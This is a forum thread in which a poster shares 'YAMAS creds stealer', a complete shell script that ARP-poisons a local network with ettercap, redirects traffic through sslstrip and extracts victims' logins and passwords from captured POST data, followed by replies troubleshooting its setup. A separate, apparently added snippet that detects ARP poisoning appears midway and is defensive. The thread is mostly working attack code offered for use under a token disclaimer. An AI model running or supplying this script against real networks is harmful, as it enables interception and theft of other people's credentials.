
Author Topic: YAMAS creds stealer  (Read 4065 times)

Offline D4rk-50ld13r

YAMAS creds stealer
« on: May 11, 2013, 11:53:09 PM »
Greetings everyone

Originally this script was designed to work on the NOKIA N900; it's a credentials stealer based on the famous YAMAS.
I modified a few things in it and made it work on any version of KALI & KALI ARM + Android.

Instructions

Make a folder in /opt and name it Yamas.
Place yamas.sh in it.
Make the script executable.
Run it: cd /opt/Yamas
        ./yamas.sh

Enjoy  ;)

Code:
#!/bin/sh

# Bash script to launch man in the middle attack and sslstrip.
# Based on yamas v0.9 by comaX for pcsci3ence.info

# device variables
pathLog=/opt/Yamas

# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.

#Check if the script is being run as root
if [ "$(id -u)" != "0" ]; then
   echo -e "\033[31mYou are not running this script as root.\nPlease become root (e.g. \"sudo gainroot\") before launching this script\033[m"
   exit
fi

#Check if the required dependencies exist.
dep() {
   echo; echo -en "Checking for the needed dependencies:\n"
   echo -en "\t wget\t\t"
   if dpkg -l | grep wget 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t busybox-power\t"
   if dpkg -l | grep -w busybox-power 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t xterm\t\t"
   if dpkg -l | grep -w " xterm" 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t iptables\t"
   if dpkg -l | grep iptables 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
     
   echo -en "\t nmap\t\t"
   if dpkg -l | grep nmap 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi

   echo -en "\t grep\t\t"
   if dpkg -l | grep libpcre3 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t pcap\t\t"
   if dpkg -l | grep libpcap0.8 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 > ./test.txt
   fi
         
   echo -en "\t sslstrip\t"
   #if dpkg -l | grep sslstrip 1>/dev/null; then  # "sslstrip" package doesn't exist. One has to compile on target.
   if [[ -e "/usr/bin/sslstrip" ]]; then          # therefore we do a simple check of existence
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
     
   echo -en "\t ettercap\t"
   if dpkg -l | grep ettercap 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi

   echo -en "\t python-twisted-web"
   if dpkg -l | grep python-twisted-web 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi

   echo -en "\t python-pyopenssl"
   if dpkg -l | grep python-pyopenssl 1>/dev/null; then
     echo -e "\t\033[32m[Success]\033[m"
   else
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   if [[ ! -e "./test.txt" ]]; then
      echo "All right ! Let's keep rolling..."
   else
      rm ./test.txt
      echo "You are missing dependencies, this script will probably fail."
      sleep 5
      #exit ?
   fi
}

#Check if yamas folder exists, if not create it
if [ ! -d "$pathLog" ]; then
   mkdir $pathLog
fi

if [ ! -f "/tmp/grepcred.txt" ]; then #in N900 the /tmp is purged at every reboot
   wget -q http://comax.pagesperso-orange.fr/info/mitm/grepcred.txt -O /tmp/grepcred.txt #downloading temp file needed for parsing.
fi   #We do it now : we don't have to download twice in case --parse is used, and the script

#Let's define some arguments that can be passed to the script :
args=
while [ "$#" -ge 1 ] #check parameters
do
  case $1 in
   -d | --dependencies) #check for dependencies
      clear
      dep # calling the function.
      exit 0 ;;
     
-p | --parse) #parse a given filename
      if [[ "$2" == "" ]]; then
         echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
         exit 0
      fi
      clear
      echo -e "Parsing $2 for credentials.\n\n"
      cat $2 |
         awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
         awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
         egrep -i -a -f /tmp/grepcred.txt |
         awk -F "=" '{if (length($2) < 4) print "";
                      else if ($1 ~/Website/) print $0;
                      else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
                      else print "Login = \t"$2}' |
         uniq
      exit 0 ;;
     
  -h | --help) #define help message
      clear
      echo -e "You are running $0, YAMAS-ARM.

usage : $0 [-h | --help] [-p | --parse <file>]
   -h or --help : Displays this help message, disclaimer and exit.
   -d or --dependencies : Check if needed dependencies are satisfied and exit.
   -p or --parse: Only parse the given <file>. Don't use wildcards.
             Use > /output_file to print to a file.

\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting.

\033[31mFeatures :\033[m
- Compatbile with handled devices.
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D

\033[31m Credits :\033[m
Thanks to all people on backtrack forums for their help and support,
as well as maemo's for this version.
Kudos to Unhuman for asking for this port and testing everything I asked him,
Torpedo, both script-wise and for his great demo video,
Saturn for making this script fully ash compliant,
All the other people for their feedback, support, and help !
And google for being my best friend with scripting.

Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-arm or send me a mail at contact.comax@gmail.com

"
      exit ;;

*) echo "Invalid parameters, continuing with script $0" & sleep 2 ;;
  esac
  shift
done

clear
echo -e "\b
                  #     #    #    #     #    #     ##### 
                   #   #    # #   ##   ##   # #   #     #
                    # #    #   #  # # # #  #   #  #       
                     #    #     # #  #  # #     #  ##### 
                     #    ####### #     # #######       #
                     #    #     # #     # #     # #     #
                     #    #     # #     # #     #  #####
                        ARM Edition For Pcsi3ence.info
===========================================================================
=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
=\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-arm                    =
=       Check out the help (-h) to see edition informations               =
=       You are running \033[32mYAMAS-arm\033[m                                    =
==========================================================================="

# Starting fresh : reset IP forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."

# Defining exit function and other ending features
fast_cleanup() {
   echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
   if [[ "${looparseid}" != "" ]]; then kill ${looparseid}
   fi
   if [[ "${sslstripid}" != "" ]]; then kill ${sslstripid}
   fi
   if [[ "${tailgrepid}" != "" ]]; then kill ${tailgrepid}
   fi
   killall ettercap
   echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
   iptables --flush          # there are probably too many resets here,
   iptables --table nat --flush # but at least we're sure everything's clean
   iptables --delete-chain
   iptables --table nat --delete-chain
   if [ -e '/tmp/looparse.sh' ]; then
      rm /tmp/looparse.sh
   fi
   #We don't remove grepcred.txt anymore, in case it's needed later on for parsing, without internet connection.
   echo -e "\033[32m[-] Clean up successful !\033[m"
   exit 0
}

cleanup() {
   echo
   echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"

   kill ${sslstripid}
   kill ${looparseid}
   if [[ "${tailgrepid}" != "" ]]; then
      kill ${tailgrepid}
   fi
   killall ettercap
   echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
   iptables --flush # there are probably too many resets here,
   iptables --table nat --flush # but at least we're sure everything's clean
   iptables --delete-chain
   iptables --table nat --delete-chain
   rm /tmp/looparse.sh

   echo -e "\033[32m[-] Clean up successful !\033[m"
   echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
   echo "(If you want to keep it, it will be stored in $pathLog/saved/$filename.txt)"
   read keep
   if [[ "$keep" = "Y" || "$keep" = "y" ]] ; then # double brackets because double condition. || signifies "or"
      mkdir $pathLog/saved/
      cp $pathLog/$filename.txt $pathLog/saved/$filename.txt #moving file
         if [ -f "$pathLog/saved/$filename.txt" ]; then #check if it exists
            echo "Log file copied !" #it does
         else
            echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
         fi
   else
      echo "Logs not saved"
   fi
   echo
   echo "Do you want to save passwords to a file? (Y=keep)"
   echo "(If you want to keep it, it will be saved in $pathLog/saved/$filename.pass.txt)"
   read keeppd
   if [[ "$keeppd" = "Y" || "$keeppd" = "y" ]] ; then # double brackets because double condition. || signifies "or"
      mkdir $pathLog/saved/
      cat $pathLog/$filename.txt |
         awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
         awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
         egrep -i -a -f /tmp/grepcred.txt |
         awk -F "=" '{if (length($2) < 4) print "";
            else if ($1 ~/Website/) print $0;
            else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
            else print "Login = \t"$2}' |
         uniq >> $pathLog/saved/$filename.pass.txt # >> appends to a potential previous file.
      if [ -f "$pathLog/saved/$filename.pass.txt" ]; then #check if it exists
         echo "Passwords saved !" #it does
      else
         echo "Error while saving passwords" #it does not
      fi
   else
      echo "Password saving skipped."
   fi
   rm $pathLog/$filename.txt
   echo -e "\nTemporary files deleted."
}

search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan () {
   echo -e "\033[31m"
   nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
   echo -en "\033[m"
   final
}

add_target() {
   echo "Enter a new IP adress to attack :"
   read newip
   xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e "sudo ettercap -o -q -i wlan0 -T -M arp  /$newip/ // 2>/dev/null & sleep 2" &
   final
}

ascii() {
   clear
   if [ ! -f "$pathLog/ascii" ]; then #if the ascii list doesn't exist get it from the web.
      wget -q http://comax.pagesperso-orange.fr/info/mitm/ascii -O $pathLog/ascii
   fi
   cat $pathLog/ascii
   #rm /tmp/ascii
   final
}

tailsecure() {
   xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f $pathLog/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
   final
}

rtparse() {
   echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
   1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
   2. Resume RTP.
   3. Kill RTP (stop and close xterm)
   4. Re-launch RTP
   5. Previous menu."
   read rtp
   if [ "$rtp" = "1" ] ; then
      echo -e "\033[33mPausing...\033[m"
      kill -19 ${looparseid}
      rtparse
   elif [ "$rtp" = "2" ] ; then
      echo -e "\033[33mResuming...\033[m"
      kill -18 ${looparseid}
      rtparse
   elif [ "$rtp" = "3" ] ; then
      echo -e "\033[31mKilling...\033[m"
      kill ${looparseid}
      rtparse
   elif [ "$rtp" = "4" ] ; then
      echo -e "\033[32mLaunching...\033[m"
      xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
      sleep 2
      rtparse
   elif [ "$rtp" = "5" ] ; then
      echo "Previous"
      final
   else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
      rtparse
   fi
}

final() {
   echo -e "\n\033[32mAttack is running\033[m. You can :
   1. Rescan network.
   2. Add a target (useless if targeting whole network).
   3. Display ASCII correspondence table.
   4. Tail-grep hosts through output (make sure there is traffic).
   5. Real-time parsing...
   6. Quit properly.

   Enter the number of the desired option."
   read final
   if [ "$final" = "1" ] ; then
      rescan
   elif [ "$final" = "2" ] ; then
     add_target
   elif [ "$final" = "3" ] ; then
     ascii
   elif [ "$final" = "4" ] ; then
     tailsecure
   elif [ "$final" = "5" ] ; then
     rtparse
   elif [ "$final" = "6" ] ; then
     cleanup
   else
      echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
      final
   fi
}

###############################End of functions#############################

# IP forwarding
echo
echo -e "\033[31m [+] Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read outport
if [ "$outport" = "" ] ; then
   outport=8080
   echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read inport
if [ "$inport" = "" ] ; then
   inport=80
   echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo  "Choose filename to output : (default = yamas)"
read filename
if [ "$filename" = "" ] ; then
   filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in $pathLog/$filename.txt\033[m"
sslstrip -f -a -k -l $outport -w $pathLog/$filename.txt 2> /dev/null & sslstripid=$!

sleep 2 #let time for sslstrip to launch. Might be a bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo

#ARP poisoning
echo
echo -e "\033[31m [+] Activating ARP poisoning... \033[m"
echo
ip route show | awk '(NR == 2) { print "Gateway :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read gateway
if [ "$gateway" = "" ] ; then
   gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
   echo -e "$gateway selected as default.\n"
fi
echo
echo "Using wlan0 as interface"
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read choicearp
echo

if [[ "$choicearp" = "D" || "$choicearp" = "d" ]] ; then
   echo
   echo -e "Do you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
   read hosts
   echo -e "\033[31m "
      if [[ "$hosts" = "Y" || "$hosts" = "y" ]] ; then
         nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
         echo -e "\033[m " # switch color back to white
      else
         echo -e "\033[m "
      fi
   echo -e "Please enter targets according to usage : IP1 IP2 IP3 ... IPn
   \033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
   ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
      while [ "$1" != "" ]; do
         xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i wlan0 -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
         shift
      done
      echo -e "\033[33m Targeting $parameters on $gateway through wlan0.\033[m"
   }
   echo "Enter IP adresse(s)."
   read parameters
   ettercapi $parameters

else
   xterm -geometry 90x3-1-1 -T ettercap -e 'ettercap -o -q -i wlan0 -T -M arp  /$gateway/ //' &
   sleep 2
   echo -e "\033[33m Targeting the whole network on $gateway on wlan0 with Ettercap\033[m"
   echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
fi

echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat $pathLog/$filename.txt |
      awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
      awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
      egrep -i -f '/tmp/grepcred.txt' |
      awk -F \"=\" '{if (length(\$2) < 3) print \"\";
      else if (\$1 ~/[W]/) print \$0;
      else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
      else print \"Login = \t\t\", \$2}' |
      uniq
      sleep 7
done
  }
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.

Credits to ComaX for the great script.

« Last Edit: May 12, 2013, 12:47:52 AM by D4rk-50ld13r »
If you sat a monkey down in front of a keyboard, the first thing typed would be
a unix command.
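
A defender-side check for the ARP poisoning step the script above automates, as an added example that is not part of the original post or of YAMAS. It reads `ip -4 neigh show` output on a client; every address, the pinned gateway MAC and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example (not part of YAMAS): spot ARP cache poisoning in the output of
# `ip -4 neigh show` on a client. All addresses below are constructed samples.

# Neighbour table while 192.168.1.50 answers ARP for the gateway 192.168.1.1.
SAMPLE_POISONED='192.168.1.1 dev wlan0 lladdr 02:00:00:AA:BB:CC REACHABLE
192.168.1.50 dev wlan0 lladdr 02:00:00:aa:bb:cc STALE
192.168.1.23 dev wlan0 lladdr 5c:00:00:00:00:17 REACHABLE
192.168.1.77 dev wlan0  FAILED'

# Healthy table: the IPv6 entry sharing the router MAC is normal and ignored.
SAMPLE_CLEAN='192.168.1.1 dev wlan0 lladdr 5c:00:00:00:00:01 REACHABLE
fe80::1 dev wlan0 lladdr 5c:00:00:00:00:01 router REACHABLE
192.168.1.23 dev wlan0 lladdr 5c:00:00:00:00:17 STALE'

PINNED_GW_MAC='5C:00:00:00:00:01'   # assumed known-good gateway MAC

# Print "<mac> <ip> <ip> ..." for every MAC claimed by more than one IPv4
# address. Multi-homed hosts and proxy ARP also trigger this, so treat a hit
# as a lead to verify, not as proof.
dup_macs() {
    awk '
        $1 !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ { next }      # IPv4 only
        {
            mac = ""
            for (i = 2; i < NF; i++)
                if ($i == "lladdr") mac = tolower($(i + 1))
            if (mac == "") next              # FAILED / INCOMPLETE entries
            if (count[mac]++ == 0) { order[++n] = mac; ips[mac] = $1 } else ips[mac] = ips[mac] " " $1
        }
        END {
            for (k = 1; k <= n; k++)
                if (count[order[k]] > 1) print order[k], ips[order[k]]
        }'
}

# check_gateway <gateway_ip> <pinned_mac>, neighbour table on stdin.
# Returns 0 if the gateway entry matches the pinned MAC, 1 if it differs
# (possible poisoning), 2 if the table has no resolved entry for the gateway.
check_gateway() {
    cur=$(awk -v gw="$1" '
        $1 == gw { for (i = 2; i < NF; i++)
                       if ($i == "lladdr") { print tolower($(i + 1)); exit } }')
    [ -n "$cur" ] || return 2
    [ "$cur" = "$(printf '%s' "$2" | tr 'A-Z' 'a-z')" ]
}

# Demo on the constructed samples; on a real host feed `ip -4 neigh show`.
printf '%s\n' "$SAMPLE_POISONED" | dup_macs
if printf '%s\n' "$SAMPLE_POISONED" | check_gateway 192.168.1.1 "$PINNED_GW_MAC"
then echo "gateway MAC matches pinned value"
else echo "gateway MAC differs from pinned value"
fi
```

The pinned MAC has to be recorded while the network is known to be clean, for example from the router's label or its admin page.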

Offline darkc0d3

Re: YAMAS creds stealer
« Reply #1 on: May 12, 2013, 01:07:04 AM »
Very nice, D4rk. I'm running this script now, first time in wheezy for me.
I'm playing with this right now and ........ I'm not sure..... well, it does not save the text in /opt;
it is empty
root@pentester:~# cd /opt/Yamas
root@pentester:/opt/Yamas# ls
yamas.sh
root@pentester:/opt/Yamas#

I don't know what I'm doing wrong...
Hmmmm, any ideas?
''When you have the knowledge you are a king, share the knowledge and you are God''
darkc0d3

Offline D4rk-50ld13r

Re: YAMAS creds stealer
« Reply #2 on: May 12, 2013, 01:16:43 AM »
It's all fine here!!
I trust that you did edit the "etter.conf" file, did you? ;)
If everything is set, the script will run & log creds.

Offline darkc0d3

Re: YAMAS creds stealer
« Reply #3 on: May 12, 2013, 03:14:37 AM »
I have not done that. I'm looking at it now; I think something has to change in these lines:
[privs]
ec_uid = 65534                # nobody is the default
ec_gid = 65534                # nobody is the default

 here but I do now what  exactly  :o

Offline thslover

Re: YAMAS creds stealer
« Reply #4 on: May 12, 2013, 03:40:34 AM »
darkc0d3, I think you must change those values to 0:
Code:
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

And un-hash the iptables like this:

Code:
#---------------
#     Linux
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

D4rk-50ld13r, I was using this script from the original site... the BackTrack version: http://comax.fr/yamas.php. Your version is the same, only modified to work on Kali, right?

Greets

Offline D4rk-50ld13r

Re: YAMAS creds stealer
« Reply #5 on: May 12, 2013, 03:56:06 AM »
Yes, as I specified, the script is an ARM version written for the Nokia N900.
All I did is change the paths for the tools to work on Kali.
BTW, the BackTrack version is totally different from this, because Kali doesn't have a /pentest directory in it.
On BackTrack the tools involved are in /pentest/sniffers; on Kali the tools are stored in /usr/bin and /usr/sbin.
« Last Edit: May 12, 2013, 03:58:56 AM by D4rk-50ld13r »

Offline darkc0d3

Re: YAMAS creds stealer
« Reply #6 on: May 12, 2013, 04:04:36 AM »
thslover, thanks guys, I will look into it immediately. I got it; I used it before on BackTrack. I do not remember if I had to intervene in the etter.conf file; I simply installed and ran it.
The script was an awesome thief ;D ;D ;D

Offline zerocool

Re: YAMAS creds stealer
« Reply #7 on: August 12, 2014, 04:51:07 PM »
Thanks for the ARM edition of this script, but there is an issue: it fails on some dependencies.
I can't seem to install them.

Code:
Checking for the needed dependencies:
wget [Success]
busybox-power [Failed!]
xterm [Success]
iptables [Success]
nmap [Success]
grep [Success]
pcap [Success]
sslstrip [Success]
ettercap [Success]
python-twisted-web [Success]
python-pyopenssl [Failed!]
You are missing dependencies, this script will probably fail.
root@Kali-pi:~# apt-get install busybox-power
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package busybox-power
root@Kali-pi:~# apt-get install python-pyopenssl
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package python-pyopenssl





Offline 0E 800

Re: YAMAS creds stealer
« Reply #8 on: August 12, 2014, 04:59:48 PM »
The correct package name is python-openssl, try that instead.

Try looking through the script for where busybox-power is being called. You might be able to run the script without it, or maybe busybox-power is included with busybox.

apt-get install python-openssl
apt-get install busybox

Good luck.
« Last Edit: August 12, 2014, 05:02:21 PM by 0E 800 »
"He who passes not his days in the realm of dreams is the slave of the days."

Offline D4rk-50ld13r

Re: YAMAS creds stealer
« Reply #9 on: August 15, 2014, 04:34:05 PM »


Try this package, it should do the job: http://archive.debian.net/etch/arm/python-pyopenssl

satix

  • Guest
Re: YAMAS creds stealer
« Reply #10 on: June 03, 2015, 09:18:25 AM »
Anyone have any luck running this script in Kali? What is the etter.conf edit that was mentioned?